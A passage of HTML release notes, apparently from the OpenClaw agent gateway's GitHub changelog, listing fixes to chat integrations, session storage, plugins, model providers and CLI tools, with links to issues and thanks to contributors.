<li>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</li>
<li>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</li>
<li>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</li>
<li>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</li>
<li>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</li>
<li>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</li>
<li>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</li>
<li>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</li>
<li>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</li>
<li>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</li>
<li>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</li>
<li>TUI/setup: skip full provider model normalization during context-window warmup and bound Terminal hatch bootstrap provider requests, avoiding cold-start stalls with large model registries and first-run hatching stuck behind the watchdog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369916791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76241/hovercard" href="https://github.com/openclaw/openclaw/pull/76241">#76241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</li>
<li>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</li>
<li>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</li>
<li>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</li>
<li>Codex/app-server/plugins: tolerate second connection closes during startup recovery, include retry counts plus stringified restart errors, and allow the official npm Codex plugin to install without the unsafe-install override while keeping <code>/codex</code> command ownership and covering the real npm Docker live path through managed <code>.openclaw/npm</code> dependencies plus uninstall failure proof.</li>
<li>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</li>
<li>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</li>
<li>Providers/OpenRouter/LM Studio/Anthropic: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, normalize binary LM Studio reasoning metadata from Gemma 4 and other local models, and recover Anthropic-compatible stream text deltas that arrive before their matching content block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</li>
<li>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>MCP/OpenAI and media: normalize parameter-free MCP tool schemas before OpenAI tool submission, honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, and accept home-relative <code>MEDIA:~/...</code> attachment paths under the existing file-read policy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346056562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73796/hovercard" href="https://github.com/openclaw/openclaw/issues/73796">#73796</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkury">@fabkury</a>.</li>
<li>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</li>
<li>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</li>
<li>Discord/setup/startup/native commands: write resolved guild/channel allowlist selections to the selected guild and channel, persist slash-command deploy hashes across process restarts, treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, allow explicit ack reactions in tool-only guild channels, and warn when slash dispatch or direct plugin execution produces no visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</li>
<li>Discord/delivery/media: use session-backed A2A announce target lookup for multi-account <code>sessions_send</code>, keep typing indicators alive during long tool runs and auto-compaction, preserve multipart Content-Type headers for uploads, preserve attachment and sticker filenames, and keep non-ASCII channel names in session labels while preserving ASCII-slug allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</li>
